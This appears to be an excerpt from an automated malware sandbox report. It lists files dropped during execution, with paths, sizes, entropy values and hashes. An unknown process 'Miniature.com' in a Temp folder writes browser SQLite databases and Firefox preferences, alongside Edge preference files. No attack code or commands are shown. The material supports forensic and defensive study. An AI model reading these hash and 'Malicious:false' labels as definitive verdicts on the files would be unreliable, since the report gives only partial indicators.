                                                                                                                                                                                                                                                                                          MD5:7E44458E0A8A3A7D10875BC3B7AE72D1
                                                                                                                                                                                                                                                                                          SHA1:E5E6AC8676EE3761DAB13A10EB7573C19F48D297
                                                                                                                                                                                                                                                                                          SHA-256:21A04E176A9CEBDA60AE6FD82A7495C6E0867ED02B8009A44DDC9863E14D8753
                                                                                                                                                                                                                                                                                          SHA-512:012ED6CDC0802AA1063EFE841549341CC86EB626A26FC4BDC509598D8E33093296510344A2CC4419B007F6191F3445DA8F0AAE3B1626E54C1EF66DDDF3FA59B1
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "27fb6245-bd08-4de6-8f4d-2ece3f597752");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696491690);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696491694);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):159744
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                                                                          MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                                                                          SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                                                                          SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                                                                          SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):294912
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.08441928760034874
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vI:51zkVmvQhyn+Zoz67V
                                                                                                                                                                                                                                                                                          MD5:2ABDC5DBC05C0C5CE5E1EB6D6E8C1B0D
                                                                                                                                                                                                                                                                                          SHA1:14DFBE9B28D033542357D98005239D842A16FCFD
                                                                                                                                                                                                                                                                                          SHA-256:91F1008439BD28B09EC1FC851F2679DFBAA45B27409882AD899CEF8460A036AF
                                                                                                                                                                                                                                                                                          SHA-512:DD4BD1407DFDC90BC97F5940A120CCDE7D4A6DAA3E0DB1649BED96EBE52FFDF879E52E028657F954FF39A93EEE8F57694A7EAC55D85CA57AF2BBD7A7793B9030
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):40960
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):51200
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                                                          MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                                                          SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                                                          SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                                                          SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):98304
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):196608
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.2651716274333387
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:KrJ/2qOB1nxCkMPSAELyKOMq+8HKkjucswRv8p3nVumH:K0q+n0JP9ELyKOMq+8HKkjuczRv89D
                                                                                                                                                                                                                                                                                          MD5:6F09A60146E610ADC2B476E720AD813E
                                                                                                                                                                                                                                                                                          SHA1:9F436B059B4DA13F94996B64B7EB688C55BC792A
                                                                                                                                                                                                                                                                                          SHA-256:5BAB95E2F29E66C62D9254172AE0F5ED4AAC9C5C0134648992932FEBCC86BEE7
                                                                                                                                                                                                                                                                                          SHA-512:5F68D788E50EC9C7F588C3A2EAD97C8AB64EA1B0CAD1A51147651A02C608865B081F4584004C8FEAE37F06611E116C3690343BF74E1C92043420A0003BBA576D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):58627
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.100813157548634
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:qMk1rT8H1a+JPGWv/sxtwa1FFoT7VLyMV/Yosh:qMYrT8VPxv/4KwsVeZosh
                                                                                                                                                                                                                                                                                          MD5:EB53656F15A7BF4BCFA2F09B0BC99526
                                                                                                                                                                                                                                                                                          SHA1:6C369E0B3D786988A2607D015D4FDFB55207B13E
                                                                                                                                                                                                                                                                                          SHA-256:6338648EEE5F1CA330ACE75668C2FBCFA889A85CCEE78537DD6FB611D485AEA1
                                                                                                                                                                                                                                                                                          SHA-512:BE9C60F068AB934D003D157CDEB70DB51421B9F98DA6E02C1CC25A36C8CAB5BB78C58253925EC4A1D42F4DE977B5EFF7A7C57CA6518123972D7C562E7F1C22B4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"e826bae4-6872-4f07-bd22-d5abb804e7f0"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):56066
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.103039480185279
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:z/Ps+wsI7ynQPGWv/sxtw57VLyMV/YoskFoz:z/0+zI7yn0v/4KxVeZoskG
                                                                                                                                                                                                                                                                                          MD5:B38E93994A4E2C75078628A7A680A657
                                                                                                                                                                                                                                                                                          SHA1:1C2B8C37FE8B8036FEFA863DD15CC9440FC338DC
                                                                                                                                                                                                                                                                                          SHA-256:F3402F2A8B99B50129B48877CC53BB0E9253B9603975D056B23E8F0710D4C569
                                                                                                                                                                                                                                                                                          SHA-512:4EB38CCF7F086C1446B520B036974C5B05DECE1AD648D2C6A913DD8AE0C7F0E7C0703493ED2715FA5A1D6FE71013B3B91FB68C9DEAA9C772CD86D8422E690D7E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                          Size (bytes):57639
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.103863469391794
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:z/Ps+wsI7ynv0PGWv/sxtw8j7VLyMV/YoskFoz:z/0+zI7ynvAv/4KeVeZoskG
                                                                                                                                                                                                                                                                                          MD5:21966544EA39ECE0EF894DABD250021A
                                                                                                                                                                                                                                                                                          SHA1:B242191EE85E7504818F5CFD38D32C50E3797F13
                                                                                                                                                                                                                                                                                          SHA-256:190CEE62F4EDDA4D6B9B977D8EAAC00AAA09FECFAF08E7323D81152708F4F23A
                                                                                                                                                                                                                                                                                          SHA-512:E17D3C20AA3A771766295ECC1B26FDCA41572CA1A492A830F201FDC340FC763264F1679803FA8B3C3E75CA2FA6C0AB0A3A628F8C8D5D09E7E01141A6359E87BE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):57717
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.10405345468604
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:z/Ps+wsI7yOjJPGWv/sxtwaj7VLyMV/YoskFoz:z/0+zI7yOjxv/4KsVeZoskG
                                                                                                                                                                                                                                                                                          MD5:3B5BE950D94C8AEE338170ECF8FED645
                                                                                                                                                                                                                                                                                          SHA1:BEB3CC5DEF657D40239453392C0006CF3070162D
                                                                                                                                                                                                                                                                                          SHA-256:B5613AA16A0B30F98E626D4A05D168B9A9E968B6AE730A871B6B168261345763
                                                                                                                                                                                                                                                                                          SHA-512:5A1672637238CFB18A78AE80F8A0F794A55C314462AA3805DA86127658E03F1FAC1168ED28C88FFFE3112757A98755F4E003EDE9DA7CEEF8D67F6AA5CE87D85F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):58674
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.10063516034679
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:qMk1rT8H1aCJPGWv/sxtwa1FFoT7VLyMV/Yosh:qMYrT8Vtxv/4KwsVeZosh
                                                                                                                                                                                                                                                                                          MD5:65EF0FCEDC2AD184D9B6FF95EBC256CD
                                                                                                                                                                                                                                                                                          SHA1:4AE41DFF035EC55102BDC3B5FE9D6D781E766504
                                                                                                                                                                                                                                                                                          SHA-256:F8BAD3F3A59705125612C20F1BC65C048067F3A8945350B45FE9D4835D4E393E
                                                                                                                                                                                                                                                                                          SHA-512:1922F5ED6C06EE69EDD5557FD09C4F1F1D52C0482CCD6EFE4BE9D00B1539F05F15958C66642A3DFF85D3C1018C08BF17BF5C3A0BC7C5BA603DF286B64FA904DD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"e826bae4-6872-4f07-bd22-d5abb804e7f0"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):58751
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.100739857014497
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:qMk1rT8HfaCqMPGWv/sxtwa1FFoT7VLyMV/Yosh:qMYrT8/tDv/4KwsVeZosh
                                                                                                                                                                                                                                                                                          MD5:90E83C65EEB88B34130915A45D579CDA
                                                                                                                                                                                                                                                                                          SHA1:777C7251B68D33032924951B31AB1D3D7444F759
                                                                                                                                                                                                                                                                                          SHA-256:CB828DB4F9271974DB3E717ECA536BF519C62C745615C1480F3C4B2A19763623
                                                                                                                                                                                                                                                                                          SHA-512:0E3365B008A18C8BCA16CC4E64E96507B8D34A18350587F6330990649D17C2B74F0B0281B36FACE3FC8A4AED00F046125FE6F45864F937771D2186166A02F98F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"e826bae4-6872-4f07-bd22-d5abb804e7f0"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):107893
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.6401415786958475
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7L:fwUQC5VwBIiElEd2K57P7L
                                                                                                                                                                                                                                                                                          MD5:8574D972959B295FEA388493B825FDF1
                                                                                                                                                                                                                                                                                          SHA1:388510DBD841625F1DFFC1347A4C41B8AF07B23C
                                                                                                                                                                                                                                                                                          SHA-256:8520149C20006B78EBBDCD489C459D56B922C235102433F8D4C5A440ABA6E776
                                                                                                                                                                                                                                                                                          SHA-512:E50D2B5D7ED6A634865875A570CA441CD6C3AA68ED181C4329E2BDE3AA06929DA02E4D1900691C88B3D7A501AB5223140969CCDE4C2B670F0937A2A75DFA763D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4194304
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.047604523646431356
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:93k0m5tmrnOAUJYKJL7qiRDs0JVFg8XGXILhkHsBzhEhNnjvjRQ8TfRfEan8y08s:Bk0UtEsR6uHhc1FvxEa08T2RGOD
                                                                                                                                                                                                                                                                                          MD5:FA99060CCBCFF40C940EC28BDA85BF42
                                                                                                                                                                                                                                                                                          SHA1:A534194B27E63AC4044C2DE7E704E1A0D2429E4F
                                                                                                                                                                                                                                                                                          SHA-256:1533D80535ECD287095AD28D150BE5453802FC7E1E87D357E2C192EA351451FC
                                                                                                                                                                                                                                                                                          SHA-512:ED7562BBFBBCC7F92E6F4AFA0406EB7D3DD3015042CF0DA720340C58267D30BC79879D57BE690EC692B82A8554A3D011446E01CBD80A4A9A270CABEFC0FFA0BC
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4194304
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.4465688791862868
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:IxHd6LU/J6s0W0Mt2ub1wPkcV/E+5VlDdNjW38/5FrqumTXIg1HF2VPh:Kd6Kjt2uUkcVcW7y38/LqumTXIaHwBh
                                                                                                                                                                                                                                                                                          MD5:A4C6E5FDCF76D6018D4CEED39314044A
                                                                                                                                                                                                                                                                                          SHA1:84F12ABFC89E2964D53F90B84E5CE6A80A017B5D
                                                                                                                                                                                                                                                                                          SHA-256:771D627C0EC455C99A8D5F1E3D751FEF9C98D94CC674937E071953B5F490B294
                                                                                                                                                                                                                                                                                          SHA-512:C04FC65B92CEB5BD284FB7CB8B33E994C817BDD709A2F22B15CDD127EEC933F24BAF472511D6CCAE0FB3FA21AEB145939056E6B8858E4CFCAA910590E5923EFE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):280
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.16517681506792
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:FiWWltlrPYjpVjP9M4UcLH3RvwAH/llwBVP/Sh/Jzv/jSIHmsdJEU9VUn5lt:o1rPWVjWZq3RvtNlwBVsJDL7b/3U7
                                                                                                                                                                                                                                                                                          MD5:C847567DEE0317368C1EC824DE025887
                                                                                                                                                                                                                                                                                          SHA1:554098F22FEA9282FE1AAB35560849CD6FF546B1
                                                                                                                                                                                                                                                                                          SHA-256:3CF2B1CBE4F4CCFC640BCF581FD4D9FC84254D2B3839C96EA4909B61AAF28932
                                                                                                                                                                                                                                                                                          SHA-512:A976744405F6ABEBFB7513A3A6A776680334BB94A9E52AEEFE2B05259BCB3CF9781B1CCDA3655D8AA4C1E923143168F29EF3208F81ABCB93AFF5215ED3798219
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (17213), with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):17213
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.488980895156388
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:stAJ99QTryDiuabatSuypUsyByyaNPxj1chkPNPJArnIFC3OQ9vd1LOK8TbV+Flp:stAPGQSu4UsyQtJxncOo7CbGZQwMK
                                                                                                                                                                                                                                                                                          MD5:45DDEDC1DF9C22E6405238C2D144678E
                                                                                                                                                                                                                                                                                          SHA1:C128A9DD50AAC16CE7CDCD8251F7372611FE8C90
                                                                                                                                                                                                                                                                                          SHA-256:146318C42B7B49920199B0E9AB40F3C4D5683064CE9E6D1B08369B48D5A5D610
                                                                                                                                                                                                                                                                                          SHA-512:5A58AAFD14DB84346ACED8D312DF5A81ED719FAF94C7A7B5D51C3E0AC422F75149847129CB601C5D3B1CC350040EF469352977080CE21813F8EFCA11ACB8F4FB
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379071553255015","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (17563), with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):17563
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.484239907249281
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:stAJ99QTryDiuabatSuypUsyByyaNPxj1chkPNPJArnIFC3OQ9vd1Li78dK8TbV9:stAPGQSu4UsyQtJxncOo70kbGZQw8rf
                                                                                                                                                                                                                                                                                          MD5:9BCA039A4BF68103EA9D51ED7D8C3A58
                                                                                                                                                                                                                                                                                          SHA1:D76A9B50E3EF406425A10FF6CC39AD68975C415B
                                                                                                                                                                                                                                                                                          SHA-256:FF13E023E604A6EA9928330551CBC7B94FC48EE642D5F96E0FD0CB5638DC3364
                                                                                                                                                                                                                                                                                          SHA-512:25AF5CA539C96E0AD9D89A10269C9501CAA5298E9664E4D22217BA50857D223B87A7E49FA776B0A38478051108F0A4125B4362F87D971797CE982DFB6020E232
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (17398), with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):17398
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.4874446964811705
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:stAJ99QTryDiuabatSuypUsyByyaNPxj1chkPNPJArnIFC3OQ9vd1Li78dK8TbVU:stAPGQSu4UsyQtJxncOo70kbGZQw8K
                                                                                                                                                                                                                                                                                          MD5:FC591EA658A55E114FC4CB6DF5F31D3F
                                                                                                                                                                                                                                                                                          SHA1:588527AF70074892B7AF3F478CFF47A741595AF9
                                                                                                                                                                                                                                                                                          SHA-256:DC46FC149421B4E3A452C9B92E993501E41AA7437810396D75A9266CF5C11FFF
                                                                                                                                                                                                                                                                                          SHA-512:66E468A429B94C4B7241B161BBC48D775B67A5E314FF6D109F2781AC63A6B059911999AF917799C7186860029268BB6A79C923855A632AFC43BAF9F56FA65AD7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:very short file (no magic)
